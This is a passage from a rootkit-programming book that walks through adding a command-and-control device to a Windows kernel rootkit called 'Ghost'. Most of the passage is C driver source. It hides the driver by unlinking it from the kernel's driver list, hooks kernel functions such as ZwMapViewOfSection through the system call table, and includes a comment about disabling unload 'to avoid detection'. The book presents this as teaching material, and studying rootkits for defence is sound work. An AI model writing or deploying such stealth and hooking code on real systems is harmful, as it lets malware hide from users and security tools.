Handling IO within the Device Driver


After compiling Controller.c, Controller.exe can be used to send ON and OFF commands to the rootkit. However, the rootkit will need to be enhanced to process these commands. Ghost.c, Ghost.h, injectManager.c, and SOURCES were modified, and IoManager.c was created, for this purpose.

The following modification was made to Ghost.h:

  // Flag for IoManager.h #define _GHOST_ROOTKIT_ 

The following modifications were made to Ghost.c:

  #include "IoManager.h" 

This include was added, just like the inclusion in Controller.c, to provide coherent communication definitions. Ghost.c also requires this file for the two function prototypes listed at the end of IoManager.h, OnDeviceControl and OnDispatch. Hence the definition _GHOST_ROOTKIT_ in Ghost.h.

  // Global state data BOOL allowEncryption = TRUE; 

This global variable was added to keep track of the on/off state of encryption processing.

  VOID OnUnload( IN PDRIVER_OBJECT theDriverObject ) {  UNICODE_STRING deviceLink = { 0 };  // remove device controller  RtlInitUnicodeString( &deviceLink, GHOST_DEVICE_LINK_NAME );  IoDeleteSymbolicLink( &deviceLink );  IoDeleteDevice( theDriverObject->DeviceObject );  DbgPrint("comint32: Device controller removed.");  // Unhook any hooked functions and return the Memory Descriptor List  if( NewSystemCallTable )  {   UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection );   MmUnmapLockedPages( NewSystemCallTable, pMyMDL );   IoFreeMdl( pMyMDL );  }  DbgPrint("comint32: Hooks removed."); } 

OnUnload was modified to unlink and delete the device created in DriverEntry.

  NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath ) {  DRIVER_DATA* driverData; UNICODE_STRING  deviceName = { 0 };  UNICODE_STRING deviceLink = { 0 };  PDEVICE_OBJECT pDeviceController;  // Get the operating system version  PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );  // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95  // Major = 5: Windows Server 2003, Windows XP or Windows 2000  // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95  // Minor = 1: Windows XP  // Minor = 2: Windows Server 2003  if ( majorVersion == 5 && minorVersion == 2 )  {   DbgPrint("comint32: Running on Windows 2003");  }  else if ( majorVersion == 5 && minorVersion == 1 )  {   DbgPrint("comint32: Running on Windows XP");  }  else if ( majorVersion == 5 && minorVersion == 0 )  {   DbgPrint("comint32: Running on Windows 2000");  }  else if ( majorVersion == 4 && minorVersion == 0 )  {   DbgPrint("comint32: Running on Windows NT 4.0");  }  else  {   DbgPrint("comint32: Running on unknown system");  }  // Hide this driver  driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));  if( driverData != NULL )  {   // unlink this driver entry from the driver list   *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;   driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;  }  // Configure the controller connection  if( !NT_SUCCESS( Configure() ) )  {   DbgPrint("comint32: Configure failed!\n");   return STATUS_UNSUCCESSFUL;  }  // Add kernel hooks  if( !NT_SUCCESS( HookKernel() ) )  {   DbgPrint("comint32: HookKernel failed!\n");   return STATUS_UNSUCCESSFUL;  }  // Assign device controller  RtlInitUnicodeString( &deviceName, GHOST_DEVICE_CREATE_NAME );  IoCreateDevice( pDriverObject,    0,   &deviceName,   FILE_DEVICE_UNKNOWN,   0,   FALSE,   &pDeviceController );  RtlInitUnicodeString( &deviceLink, GHOST_DEVICE_LINK_NAME );  IoCreateSymbolicLink( &deviceLink, &deviceName );  pDriverObject->MajorFunction[IRP_MJ_CREATE] =  pDriverObject->MajorFunction[IRP_MJ_CLOSE] =  pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]  = OnDispatch;  // Comment out in free build to avoid detection  pDriverObject->DriverUnload = OnUnload;  return STATUS_SUCCESS; } 

Several changes were made to DriverEntry. The first is the addition of two UNICODE_STRINGs and a PDEVICE_OBJECT. These are used to create the control device to which external applications will send commands. IoCreateDevice creates the actual device, whereas IoCreateSymbolicLink enables the device to be accessed using GHOST_DEVICE_OPEN_NAME. Finally, three MajorFunctions are hooked so that Ghost can process IRP_MJ_CREATE, IRP_MJ_CLOSE, and IRP_MJ_DEVICE_CONTROL commands directed to the newly created device. Only IRP_MJ_DEVICE_CONTROL will be processed at this time. Hooking IRP_MJ_CREATE, IRP_MJ_CLOSE simply demonstrates the ability to hook any MajorFunction by allowing unprocessed commands to “pass through” the device processor.




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

Similar book on Amazon
Rootkits: Subverting the Windows Kernel
Rootkits: Subverting the Windows Kernel
A Guide to Kernel Exploitation: Attacking the Core
A Guide to Kernel Exploitation: Attacking the Core
Reversing: Secrets of Reverse Engineering
Reversing: Secrets of Reverse Engineering
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code
Malware Analyst's Cookbook and DVD: Tools and Techniques for Fighting Malicious Code

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net